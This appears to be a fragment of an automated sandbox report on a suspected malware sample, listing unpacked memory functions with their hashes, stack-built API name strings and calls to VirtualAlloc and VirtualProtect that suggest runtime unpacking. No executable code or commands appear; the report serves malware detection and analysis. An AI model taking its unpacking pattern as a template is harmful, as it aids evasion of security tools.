                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: fed62d63a8d3e548e274707076e71016603821d941310b7222098d3ef18cc0ab
                                • Instruction ID: bda908a9b43fc297713cd3cf585aaa7a1af3ee759045d00e170f6929d9ecd139
                                • Opcode Fuzzy Hash: fed62d63a8d3e548e274707076e71016603821d941310b7222098d3ef18cc0ab
                                • Instruction Fuzzy Hash: 78F1F3B2D082A89EF7208624DC44BEABB75EF81314F0481FAC44D67681DB795EC5CF66
                                Function 0294121A Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 405COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 4184aec2e35831a3b79edb93cda136f14d8441d79259335ea999d08d7ccbb228
                                • Instruction ID: e9e9cba40c4690cb0c54dce9338f66a80df9db99312725ec41617747423a105d
                                • Opcode Fuzzy Hash: 4184aec2e35831a3b79edb93cda136f14d8441d79259335ea999d08d7ccbb228
                                • Instruction Fuzzy Hash: 7FF104B2E092A49AF7218624DC04BEA7B75EF82314F0441FAD84D5B681D77E4AC5CB62
                                Function 02941749 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 399COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 1e830ffbf6554be586cb89530b102e22e6bd87388ebcce5e9dbfd781be8e8e1a
                                • Instruction ID: fa52cba7cad9a292ca76d12cb31c691eefb58252bbddc24830f3d40286fbbab0
                                • Opcode Fuzzy Hash: 1e830ffbf6554be586cb89530b102e22e6bd87388ebcce5e9dbfd781be8e8e1a
                                • Instruction Fuzzy Hash: 42F1F3B2D082A89EF7208A24DC44BEABB75EF81314F0481F9C44D67681DB795EC5CF66
                                Function 02941931 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 397COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 700d52e0d7aa77217a11be71783a65389384796aeddb6dd922ef043d17fd6b1b
                                • Instruction ID: a28c284535e5e30c14fd0cfbc93ddc94c98fb510285f9d269ebc8a7684beff82
                                • Opcode Fuzzy Hash: 700d52e0d7aa77217a11be71783a65389384796aeddb6dd922ef043d17fd6b1b
                                • Instruction Fuzzy Hash: 6CF1F3B2D082A89EF7208A24DC44BEABB75EF81314F0441FAC44D67681DB795EC5CF66
                                Function 029419F7 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 368COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 651745b439c0c248680645048d1af42e2e8537bd793ef4447ed52caf1002da9f
                                • Instruction ID: cc3a77bd165bb0359de1945b7022ab2443ac7c8823d91c8139e57be0993a8a5f
                                • Opcode Fuzzy Hash: 651745b439c0c248680645048d1af42e2e8537bd793ef4447ed52caf1002da9f
                                • Instruction Fuzzy Hash: 23E1F3B1E082A89EF7218624DC44BEABB75AF82304F0441F9C54D6B281D77E5EC5CF66
                                Function 0041C71E Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 331memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$^P$c$e$i$o$r$s$s$t$uAV$x
                                • API String ID: 544645111-1540573093
                                • Opcode ID: 3437785ee544309cc4b7c62731e30247df3d8a6a0083c07d63e8da77b751803e
                                • Instruction ID: 708aac10cd34a17b44f8c9627c5c1ffeca0519603262093eff09b0db8b05a00a
                                • Opcode Fuzzy Hash: 3437785ee544309cc4b7c62731e30247df3d8a6a0083c07d63e8da77b751803e
                                • Instruction Fuzzy Hash: E2D1E0B1D442688FEB24CB14DCC4BFABBB5EB81305F1440EAD84D66281DA79AEC1CF55
                                Function 0041C5B5 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 324memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$^P$c$e$i$o$r$s$s$t$uAV$x
                                • API String ID: 544645111-1540573093
                                • Opcode ID: 8a621b6fca36c01c49a1298855b3b308ee898c29b8a0419d8b432a595c275d39
                                • Instruction ID: 146639f01837a95b9be97e3fac8e6777fa23a770a186719170d3dc2f8ab4a73c
                                • Opcode Fuzzy Hash: 8a621b6fca36c01c49a1298855b3b308ee898c29b8a0419d8b432a595c275d39
                                • Instruction Fuzzy Hash: 2CC1E3B1D042688BE7248A15DC84BEBBBB5EB81314F0481FAD84E67280D6795EC5CF96
                                Function 02961F8F Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 240COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: F2=:$JMI:$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 544645111-3223098477
                                • Opcode ID: 493292fb2f9fc04911956882c952a6548ba359113382f5b0b10aee5bebb6dbc7
                                • Instruction ID: ab8a24d4285ebd3a3e444d6231993b3215a9ddbe2865160a0538a581edf97e74
                                • Opcode Fuzzy Hash: 493292fb2f9fc04911956882c952a6548ba359113382f5b0b10aee5bebb6dbc7
                                • Instruction Fuzzy Hash: 3F911BB1D046A49BE720C764DC58BEABBB6AF91310F0440FAC84C67281D77A4ED5CF92
                                Function 0041CE79 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 417memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$^Q$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-3323660942
                                • Opcode ID: 7f30483d584b78a7de07ba3482b8c4a3f51251fb60c66a73addb9e651a0d54c6
                                • Instruction ID: ddc7ee4ec6c55b187e907892f81279fb50d664dfa0831b36c170408131dcb76b
                                • Opcode Fuzzy Hash: 7f30483d584b78a7de07ba3482b8c4a3f51251fb60c66a73addb9e651a0d54c6
                                • Instruction Fuzzy Hash: 6CF1C1B1D046688FEB24CB14CC90BEABBB5EF85304F1441EAD84D97241D63A9ED2CF56
                                Function 02962272 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 330COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 1dd2db08d8a23d0a5240a430f97951dd6feefdd2dfd720b1c1c158e7a8c455fc
                                • Instruction ID: 1f41fcbdbb4c7d011a19f3eef79c45675161671207aee0c03ad12fb99283d9ae
                                • Opcode Fuzzy Hash: 1dd2db08d8a23d0a5240a430f97951dd6feefdd2dfd720b1c1c158e7a8c455fc
                                • Instruction Fuzzy Hash: BFC109B1D041659BE7248B24DC48BEBBBB6EF91300F0441FAD94DA7281D67A4ED1CF92
                                Function 004149A2 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 319COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-4069139063
                                • Opcode ID: 769843bf38530d41096b11dae6196c2951e44647c4c91a11049aa3d590178f21
                                • Instruction ID: d0b6d2d6f073f76ff321bc9a4ae50a009e98f319fcad445024cbbb8fd92210b8
                                • Opcode Fuzzy Hash: 769843bf38530d41096b11dae6196c2951e44647c4c91a11049aa3d590178f21
                                • Instruction Fuzzy Hash: 43C123B2D04664DAE7208A24DC44BEB7B79EF81310F1481FAD80D97681D67E4FC6CB66
                                Function 029620B5 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 294COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 544645111-4069139063
                                • Opcode ID: cfd1d1ccf4a05c8afad597f707698595c81f8c5a4bb31b05db39e26f4435d142
                                • Instruction ID: 8da68d5ed6642abadf9b8d3c30771c2ca8eba717718a7a2a22cd31431f5552ab
                                • Opcode Fuzzy Hash: cfd1d1ccf4a05c8afad597f707698595c81f8c5a4bb31b05db39e26f4435d142
                                • Instruction Fuzzy Hash: 07B1F7B1D042659AE7208B24DC48BEBBBB6EF95300F0441FAD94CA7241D67A4ED5CF92
                                Function 029621D5 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 294COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: da14ae8c06f2685ad03b6847da64e08051a96425e352adaf699d967a5972b677
                                • Instruction ID: 7bc62df49daf9119737963b9e8e996a422890a7724d415453e456b4fcd2f49fc
                                • Opcode Fuzzy Hash: da14ae8c06f2685ad03b6847da64e08051a96425e352adaf699d967a5972b677
                                • Instruction Fuzzy Hash: 12B107B1D042659AE7208B64DC48BFBBAB6EF95300F0441F9D94CA7281D67A0FD1CB92
                                Function 0296203B Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 223COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 1988326a05b98cf1a0ded185ff42b516c1547248ec08ad1e3284204157786049
                                • Instruction ID: 0f6bd89c315d16b873825d137f503530601fca5ec4a2c8054982f056cf9ff08f
                                • Opcode Fuzzy Hash: 1988326a05b98cf1a0ded185ff42b516c1547248ec08ad1e3284204157786049
                                • Instruction Fuzzy Hash: 8A812CB1D046A49AE720C764DC18BEB7AB6AF91310F0540F9C94C6B281D67E0FD5CF92
                                Function 02962042 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 220COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 76c0e24cc3e59ee7654d7ac2d6d95bb3281b4e38e8664f16ddaa9d689c52f879
                                • Instruction ID: fe8a8b69aa97b457d92db753800329547630135fccb0b984c6f7dd39a7d06344
                                • Opcode Fuzzy Hash: 76c0e24cc3e59ee7654d7ac2d6d95bb3281b4e38e8664f16ddaa9d689c52f879
                                • Instruction Fuzzy Hash: D8813CB1D046A49AE720C764DC18BEBBAB6AF91310F0540F9C94C67281D67E4FD5CF92
                                Function 029270D0 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 449memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: fb25d921bb9996adecb7f436dc0e5170db6eb520608647257d43fe6d66941192
                                • Instruction ID: 00c843180c34f3bf577747026639915f50a9ba5a1690fbac64cbe5b7bff657da
                                • Opcode Fuzzy Hash: fb25d921bb9996adecb7f436dc0e5170db6eb520608647257d43fe6d66941192
                                • Instruction Fuzzy Hash: 1602E1A2D142689BF7248A24DC44BAAB679FB94310F0481FAD50DAB684D67D0FC58F62
                                Function 02926EE1 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 449memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: fea7f0688bbbf85a27379939831641a14fc3db0e5b1ff80e6e2f733f09ff2b5f
                                • Instruction ID: bd335c4dda15d9ce8cce6459acd9115ed50660c5d08a6e985a9accac524be4a1
                                • Opcode Fuzzy Hash: fea7f0688bbbf85a27379939831641a14fc3db0e5b1ff80e6e2f733f09ff2b5f
                                • Instruction Fuzzy Hash: 1E02F2A2D142689FF724CA24DC44BAAB779FB94310F0481FAD40DAB684D67D1FC58F62
                                Function 02926E26 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 417COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-29643960
                                • Opcode ID: 5ca3478816cdc15a498f0303cc86a2e72a97d7a824fb026cabe95488de085e69
                                • Instruction ID: 3317e204493100d20a913c426826537f7cd756ff075e799b533ff637f6abc5bd
                                • Opcode Fuzzy Hash: 5ca3478816cdc15a498f0303cc86a2e72a97d7a824fb026cabe95488de085e69
                                • Instruction Fuzzy Hash: 1AF1F3A2D142689BF720CA24DC44BAAB779FF90310F0481FAD44DAB684D67D5FC58F62
                                Function 0292722C Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 408memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: 786cc962431d2af92394e959a3d2af061ed35903023aadf4eb7a310eaaa043bf
                                • Instruction ID: 026f6900374647694f4b2f9d46ba5527048750986c05cbd07db0b534e8dd536e
                                • Opcode Fuzzy Hash: 786cc962431d2af92394e959a3d2af061ed35903023aadf4eb7a310eaaa043bf
                                • Instruction Fuzzy Hash: 7FF1F3A2D142688BF724CA24DC44BAAB779FF94310F0481FAD40DAB684D67D4FC58F62
                                Function 02927250 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 398memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: cb53689f5ce0d9260e266dd455a0c6d321342059bec7995892a4fc94e845db01
                                • Instruction ID: 1196e9c089a66f512841f596f3331ef9011f724a0a8e4a05f1ef26f6ec0b209c
                                • Opcode Fuzzy Hash: cb53689f5ce0d9260e266dd455a0c6d321342059bec7995892a4fc94e845db01
                                • Instruction Fuzzy Hash: 5CF1E3A2D142688BF724CA24DC44BAAB779FF94310F0481FAD40DAB684D67D4FC58F62
                                Function 0292727D Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 386memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: cbed119e5ed15b91ede6a7d365343e7c8df068eddb4e6b6efe16d635cfeb8da2
                                • Instruction ID: 7058f449486f80f4662128dc323d337fb247fd49ef96a691fc865da8eb6e838b
                                • Opcode Fuzzy Hash: cbed119e5ed15b91ede6a7d365343e7c8df068eddb4e6b6efe16d635cfeb8da2
                                • Instruction Fuzzy Hash: 87E1D2A2D142689BF720CA24DC44BAAB779FF94310F0481FAD40DAB684D67D4FC58F62
                                Function 02927290 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 383memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: fc5dcf52289f7fec85f36d15c23609fe4b48c9277f4d4ded27dfca984b25284a
                                • Instruction ID: 7b8d3134fedba1897207679e9d340363bb3f3cd7025c25dc19f9e2495c1c8401
                                • Opcode Fuzzy Hash: fc5dcf52289f7fec85f36d15c23609fe4b48c9277f4d4ded27dfca984b25284a
                                • Instruction Fuzzy Hash: C4E1E4A2D142688BF724CA24DC44BAAB779FF94310F0481FAD44DAB684D67D0FC58F62
                                Function 02926EA4 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 380memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: 70b02c6aaa016ba2cb4a8fe684bb8757ecd7174c2f695cba2b0bcae5e7e52a7c
                                • Instruction ID: 3c568ca250d6bd457ecce84b32ed907d032263dac589f5f1e6c0c14ccae549b6
                                • Opcode Fuzzy Hash: 70b02c6aaa016ba2cb4a8fe684bb8757ecd7174c2f695cba2b0bcae5e7e52a7c
                                • Instruction Fuzzy Hash: 84E107A2D142649BF720CA24DC44BAAB779FF90310F0481FAD50DAB684D67E4FC58F62
                                Function 02926A92 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 379memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: 2f74dc7c6930b476c9b40f36dc81f323d7a27a79a27b2a5d513c2a33aa8a1b6b
                                • Instruction ID: 00331f84dcfe439c9999ab1a9a259eb27d57a968dbdf5e16c4c3745632d5ef88
                                • Opcode Fuzzy Hash: 2f74dc7c6930b476c9b40f36dc81f323d7a27a79a27b2a5d513c2a33aa8a1b6b
                                • Instruction Fuzzy Hash: 0FE1F5A2D142689BF720CA24DC44BAAB779FF94310F0481FAD40DAB684D67D5FC58F62
                                Function 02926EBE Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 372memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: 3e57bfafc0562b18b80eddf967cdf0960860d13f48004d0174e7ad811ebe5797
                                • Instruction ID: 2ba0124bdfd4449efad7ea0d153bcdbc98e17af4f70d82d35965968a333f187d
                                • Opcode Fuzzy Hash: 3e57bfafc0562b18b80eddf967cdf0960860d13f48004d0174e7ad811ebe5797
                                • Instruction Fuzzy Hash: C1E1F5A2D142688BF720CA24DC44BAAB779FF94310F0481FAD50DAB684D67D5FC58F62
                                Function 029272DD Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 372memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: 62814fdda2b4ae882a87055fb4ff028508c30a5eef97f64c18f7bb029f6a8de6
                                • Instruction ID: 31f47784c4b6fcad987cf744d839cad0952868b4353ea4d59f22f83ebe1da753
                                • Opcode Fuzzy Hash: 62814fdda2b4ae882a87055fb4ff028508c30a5eef97f64c18f7bb029f6a8de6
                                • Instruction Fuzzy Hash: C1E1F4A2D142689BF720CA24DC44BAAB779FF94310F0481FAD40DAB684D67D0FC58F62
                                Function 02927618 Relevance: 21.3, APIs: 1, Strings: 13, Instructions: 344memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                • Opcode ID: d927e30da6ac46c388076bb3a9f4eb0a033cb128782969891e53c428596a0285
                                • Instruction ID: 98b8de642f589e158936076ff63b781b8ef403caed94feb5be32a0c24bfa18c4
                                • Opcode Fuzzy Hash: d927e30da6ac46c388076bb3a9f4eb0a033cb128782969891e53c428596a0285
                                • Instruction Fuzzy Hash: 56D1E3E1D142689AF720CA24DC44BAAB779FF94310F0481FAD44DA7680D67E5FC58F22
                                Function 029626FE Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 316memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: HP<3$KCA2$P5BE
                                • API String ID: 544645111-96660345
                                • Opcode ID: c94f96102e5a137d7e81a5e359c3f4a4d57f7ee2665a8f21c9c7a86ab68c9c2c
                                • Instruction ID: 30d39bc39c766ae26c5eda1f5faa4b128235ca841b8ee3143e2b94bf4edd18fd
                                • Opcode Fuzzy Hash: c94f96102e5a137d7e81a5e359c3f4a4d57f7ee2665a8f21c9c7a86ab68c9c2c
                                • Instruction Fuzzy Hash: C7B1E6B2D0426A9BE7248B24DC98BFABBB5FF81300F0441F9D84D56681D6785EC6CF52
                                Function 02962612 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 208memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
